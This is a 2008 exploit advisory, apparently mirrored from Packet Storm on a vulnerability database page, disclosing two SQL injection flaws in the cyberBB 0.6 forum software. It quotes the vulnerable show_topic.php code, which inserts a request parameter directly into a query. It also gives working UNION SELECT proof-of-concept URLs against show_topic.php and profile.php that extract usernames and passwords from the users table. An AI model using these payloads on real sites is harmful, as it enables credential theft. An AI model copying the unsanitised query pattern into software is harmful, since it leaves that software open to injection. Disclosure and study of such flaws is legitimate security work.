Lucene search
K

cyberbb-sql.txt

🗓️ 18 Aug 2008 00:00:00Reported by cOndemnedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 11 Views

cyberBB v. 0.6 Remote SQL Injection Vulnerabilities, source /show_topic.php, proof of concept, profile.php exploi

Code
`########################################################################################  
#  
# Name : cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities  
# Author : cOndemned [ Dark-Coders ]  
# Greetz : Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...  
# Conditions : Magic quotes gpc = On & Off / User must be logged into   
#  
########################################################################################  
  
source of /show_topic.php :  
  
21. $id=$_REQUEST['id'];  
22.  
23. if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';  
24.  
25. $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);  
26.  
27. mysql_select_db($mysql_db);  
28.  
29. $sql = "SELECT * FROM `topics` WHERE `id` = $id";  
  
  
proof of concept :  
  
/show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*  
  
  
second sql injection (magic quotes gpc must be off):  
  
/profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*  
  
  
just 4 fun  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
11